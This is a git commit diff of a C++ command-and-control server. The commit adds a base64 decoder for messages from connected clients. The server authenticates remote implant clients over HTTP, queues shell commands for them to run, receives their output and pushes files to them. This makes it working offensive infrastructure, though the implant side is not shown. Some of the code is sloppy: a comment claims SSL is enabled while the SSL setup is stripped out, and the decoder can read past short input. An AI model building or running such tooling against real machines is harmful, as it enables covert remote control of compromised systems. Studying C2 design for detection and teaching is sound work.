Added base64 decoding function and references

This commit is contained in:
elimin8 2022-06-13 22:00:09 +01:00
parent 0f49200ac2
commit eeba1c0450
No known key found for this signature in database
GPG Key ID: 0B92E083BBCCAA1E
1 changed files with 71 additions and 23 deletions

View File

@ -1,3 +1,4 @@
#include <array>
#include <fstream> #include <fstream>
#include <httpserver.hpp> #include <httpserver.hpp>
#include <iostream> #include <iostream>
@ -12,8 +13,53 @@ bool bIncomingHey = false;
std::string sIncomingHeyUser; std::string sIncomingHeyUser;
bool bShutdown = false; bool bShutdown = false;
std::vector<std::vector<std::string>> retrievecreds(std::string sFile) // takes a file path as a parameter and parses the combinations of usernames and passwords from the file for insertion into std::string decodeQuadruplet(char cEncoded1, char cEncoded2, char cEncoded3, char cEncoded4)
// a vector of strings {
std::array<std::uint8_t, 128> aDecodeTable{0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64,
0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x3E,
0x64, 0x64, 0x64, 0x3F, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x00,
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16,
0x17, 0x18, 0x19, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26,
0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x64, 0x64, 0x64, 0x64, 0x64};
std::uint32_t iCombinedChars = aDecodeTable[cEncoded1] << 18 | aDecodeTable[cEncoded2] << 12 | aDecodeTable[cEncoded3] << 6 | aDecodeTable[cEncoded4];
std::ostringstream oss;
oss << char(iCombinedChars >> 16);
oss << char(iCombinedChars >> 8 & 0xFF);
oss << char(iCombinedChars & 0xFF);
return oss.str();
}
std::string b64Decode(std::string sEncoded)
{
std::string sDecoded = "";
while (sEncoded.length() > 0)
{
if (sEncoded[3] == '$')
{
if (sEncoded[2] == '$')
{
sDecoded += decodeQuadruplet(sEncoded[0], sEncoded[1], 'A', 'A');
sEncoded.erase(0, 4);
sDecoded.erase(sDecoded.length() - 2, 2);
}
else
{
sDecoded += decodeQuadruplet(sEncoded[0], sEncoded[1], sEncoded[2], 'A');
sEncoded.erase(0, 4);
sDecoded.erase(sDecoded.length() - 1, 1);
}
}
else
{
sDecoded += decodeQuadruplet(sEncoded[0], sEncoded[1], sEncoded[2], sEncoded[3]);
sEncoded.erase(0, 4);
}
}
return sDecoded;
}
std::vector<std::vector<std::string>> retrievecreds(std::string sFile) // takes a file path as a parameter and parses the combinations of usernames and passwords from the file for insertion
// into a vector of strings
{ {
std::vector<std::vector<std::string>> sCreds; // define 2d vector of strings for storing creds std::vector<std::vector<std::string>> sCreds; // define 2d vector of strings for storing creds
std::vector<std::string> sUsernames; // vector of strings for storing usernames std::vector<std::string> sUsernames; // vector of strings for storing usernames
@ -66,8 +112,8 @@ std::vector<std::vector<std::string>> retrievecreds(std::string sFile) // takes
return sCreds; // return the sCreds 2d vector return sCreds; // return the sCreds 2d vector
} }
std::vector<std::vector<std::string>> sCreds = retrievecreds("creds"); // call the retrievecreds function with the filename "creds" as a parameter and save the returned vector to a 2d vector called std::vector<std::vector<std::string>> sCreds = retrievecreds("creds"); // call the retrievecreds function with the filename "creds" as a parameter and save the returned vector to a 2d vector
// sCreds // called sCreds
std::map<std::string, bool> createUserConnections(std::vector<std::vector<std::string>> sCreds) // takes a vector of strings containing the listed credentials and creates a dictionary containing the std::map<std::string, bool> createUserConnections(std::vector<std::vector<std::string>> sCreds) // takes a vector of strings containing the listed credentials and creates a dictionary containing the
// username of the registered client as the key and a false boolean for later use // username of the registered client as the key and a false boolean for later use
@ -93,8 +139,8 @@ std::map<std::string, std::string> createUserComms(std::vector<std::vector<std::
return mComms; // return the map return mComms; // return the map
} }
std::map<std::string, std::pair<std::string, std::string>> createUserFiles(std::vector<std::vector<std::string>> sCreds) // creates a dictionary containing the username of the registered client std::map<std::string, std::pair<std::string, std::string>> createUserFiles(std::vector<std::vector<std::string>> sCreds) // creates a dictionary containing the username of the registered
// as the key and an empty string pair for later use // client as the key and an empty string pair for later use
{ {
std::map<std::string, std::pair<std::string, std::string>> mComms; // define mComms, a map containing string as the key and value std::map<std::string, std::pair<std::string, std::string>> mComms; // define mComms, a map containing string as the key and value
@ -121,8 +167,8 @@ std::map<std::string, std::pair<std::string, std::string>> mOutFiles =
std::map<std::string, bool> mConnections = createUserConnections(sCreds); // call the defaultUserConnections function with the 2d vector sCreds as an argument, saving the returned map of std::map<std::string, bool> mConnections = createUserConnections(sCreds); // call the defaultUserConnections function with the 2d vector sCreds as an argument, saving the returned map of
// string and bool to mConnections // string and bool to mConnections
std::string listUserConnections(std::map<std::string, bool> mConnections) // iterates through the provided mConnections map, checking if the value for a username is true and if so, it adds the std::string listUserConnections(std::map<std::string, bool> mConnections) // iterates through the provided mConnections map, checking if the value for a username is true and if so, it adds
// username along with a string which confirms the client is active to the oss, which is returned as string // the username along with a string which confirms the client is active to the oss, which is returned as string
{ {
std::ostringstream oss; // declare ostringstream oss for later use as a dynamic string std::ostringstream oss; // declare ostringstream oss for later use as a dynamic string
for (auto const &[key, val] : mConnections) // for each key and value in mConnections, assign these to variables key and val for (auto const &[key, val] : mConnections) // for each key and value in mConnections, assign these to variables key and val
@ -139,8 +185,9 @@ std::string listUserConnections(std::map<std::string, bool> mConnections) // it
class command_and_control : public httpserver::http_resource // class for command and control http resource class command_and_control : public httpserver::http_resource // class for command and control http resource
{ {
public: public:
bool verifycreds(std::vector<std::vector<std::string>> sCreds, std::string sUsername, std::string sPassword) // takes 2d vector sCreds along with the provided username and password from the bool verifycreds(std::vector<std::vector<std::string>> sCreds, std::string sUsername,
// client in order to verify their credentials, returns true if successful std::string sPassword) // takes 2d vector sCreds along with the provided username and password from the
// client in order to verify their credentials, returns true if successful
{ {
for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in sCreds for (int iUsernameIndex = 0; iUsernameIndex < sCreds[0].size(); iUsernameIndex++) // for each username in sCreds
{ {
@ -164,7 +211,7 @@ class command_and_control : public httpserver::http_resource // class for comma
{ {
if (req.get_method() == "POST") // if the method used is post if (req.get_method() == "POST") // if the method used is post
{ {
if (req.get_arg("msg") == "ready") // if the client is initiating a connection if (b64Decode(req.get_arg("msg")) == "ready") // if the client is initiating a connection
{ {
std::ostringstream oss; // declare ostringstream oss for response creation std::ostringstream oss; // declare ostringstream oss for response creation
oss << "msg=acknowledged"; // add specific response for client to confirm connection has been established oss << "msg=acknowledged"; // add specific response for client to confirm connection has been established
@ -174,7 +221,7 @@ class command_and_control : public httpserver::http_resource // class for comma
mConnections[req.get_user()] = true; // set the connection value of the user in question to true mConnections[req.get_user()] = true; // set the connection value of the user in question to true
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(sResponse)); // return the generated response to the client return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(sResponse)); // return the generated response to the client
} }
else if (req.get_arg("msg") == "reqcmd") // if the client is requesting a command from the server else if (b64Decode(req.get_arg("msg")) == "reqcmd") // if the client is requesting a command from the server
{ {
if (mCommands[req.get_user()] != "") // if there is a command waiting to be executed from the server if (mCommands[req.get_user()] != "") // if there is a command waiting to be executed from the server
{ {
@ -196,26 +243,26 @@ class command_and_control : public httpserver::http_resource // class for comma
} }
} }
else if (req.get_arg("msg") == "saved") else if (b64Decode(req.get_arg("msg")) == "saved")
{ {
std::cout << "Client " << req.get_user() << " successfully saved the file." << std::endl; std::cout << "Client " << req.get_user() << " successfully saved the file." << std::endl;
mOutFiles[req.get_user()].first = ""; mOutFiles[req.get_user()].first = "";
mOutFiles[req.get_user()].second = ""; mOutFiles[req.get_user()].second = "";
} }
else if (req.get_arg("msg") == "error") else if (b64Decode(req.get_arg("msg")) == "error")
{ {
std::cout << "Client " << req.get_user() << " encountered an error whilst saving the file." << std::endl; std::cout << "Client " << req.get_user() << " encountered an error whilst saving the file." << std::endl;
mOutFiles[req.get_user()].first = ""; mOutFiles[req.get_user()].first = "";
mOutFiles[req.get_user()].second = ""; mOutFiles[req.get_user()].second = "";
} }
else if (req.get_arg("result") != "") // if the client has submitted a result from a command else if (b64Decode(req.get_arg("result")) != "") // if the client has submitted a result from a command
{ {
mCommands[req.get_user()] = ""; // the value for the client in the mCommands map wil be set to empty mCommands[req.get_user()] = ""; // the value for the client in the mCommands map wil be set to empty
mResults[req.get_user()] = req.get_arg("result"); // the value for the client in the mResults map will be set to the returned result mResults[req.get_user()] = b64Decode(req.get_arg("result")); // the value for the client in the mResults map will be set to the returned result
std::ostringstream oss; // declare osstringstream oss for response creation std::ostringstream oss; // declare osstringstream oss for response creation
oss << "msg=acknowledged"; // add specific response for client to confirm that the result from the command was recieved oss << "msg=acknowledged"; // add specific response for client to confirm that the result from the command was recieved
return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client return std::shared_ptr<httpserver::http_response>(new httpserver::string_response(oss.str())); // return the generated response to the client
} }
} }
@ -318,7 +365,7 @@ void interactConnection(std::string sIdentifier) // begin issuing commands to t
if (bResult) // if the uploadFile function returned true if (bResult) // if the uploadFile function returned true
{ {
std::cout << "Command sent, awaiting response..." << std::endl; // tell the user that the command has been added to the queue and is awaiting a response std::cout << "Command sent, awaiting response..." << std::endl; // tell the user that the command has been added to the queue and is awaiting a response
while (mOutFiles[sIdentifier].first != "") // whilst the file has not been removed from the mOutFiles array while (mOutFiles[sIdentifier].first != "") // whilst the file has not been removed from the mOutFiles array
{ {
continue; // do nothing and block further execution continue; // do nothing and block further execution
} }
@ -428,12 +475,13 @@ void prompt()
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
std::cout << b64Decode("dw$$") << std::endl;
command_and_control c2; // instanciate the command and control class command_and_control c2; // instanciate the command and control class
httpserver::webserver ws = httpserver::create_webserver(8665); //.use_ssl().https_mem_key("server.key").https_mem_cert("server.crt"); // create the webserver, ensuring ssl is enabled and httpserver::webserver ws = httpserver::create_webserver(8665); // create the webserver, ensuring ssl is enabled and
// the server is using the provided crt and key // the server is using the provided crt and key
ws.register_resource("/", &c2); // register the c2 resource at a randomly generated URL ws.register_resource("/", &c2); // register the c2 resource at a randomly generated URL
// ws.register_resource("/YVDvOraEcGwPAyjuBFzGespbRzifTpi", &c2); // register the c2 resource at a randomly generated // ws.register_resource("/YVDvOraEcGwPAyjuBFzGespbRzifTpi", &c2); // register the c2 resource at a randomly
// URL // generated URL
ws.start(false); // start the webserver in non-blocking mode ws.start(false); // start the webserver in non-blocking mode
std::thread tCheck(checkConnections); // run checkConnections in a new thread std::thread tCheck(checkConnections); // run checkConnections in a new thread
prompt(); // run the interactive prompt prompt(); // run the interactive prompt